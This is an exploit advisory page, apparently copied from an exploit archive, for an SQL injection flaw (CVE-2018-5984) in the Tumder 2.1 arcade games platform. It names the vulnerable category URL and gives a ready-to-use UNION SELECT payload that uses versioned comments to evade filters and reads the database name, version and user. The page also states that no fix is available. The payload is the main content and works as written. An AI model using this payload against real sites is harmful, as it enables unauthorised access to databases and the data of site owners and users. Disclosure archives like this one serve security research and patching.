Tumder 2.1 - SQL Injection

2018-01-23 23:05:06

# # # # #
# Exploit Title: Tumder - An Arcade Games Platform 2.1 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://sndr.co.ve/
# Software Link: https://codecanyon.net/item/tumder-an-arcade-games-platform/18726994
# Version: 2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5984
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/category/[SQL]
#
# -3 /*!01111UNION*/ /*!01111ALL*/ /*!01111SELECT*/ 0x31,0x32,CONCAT(Database(),VERSION(),0x7e,DATABASE(),0x7e,USER())-- -
#
# # # # #

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.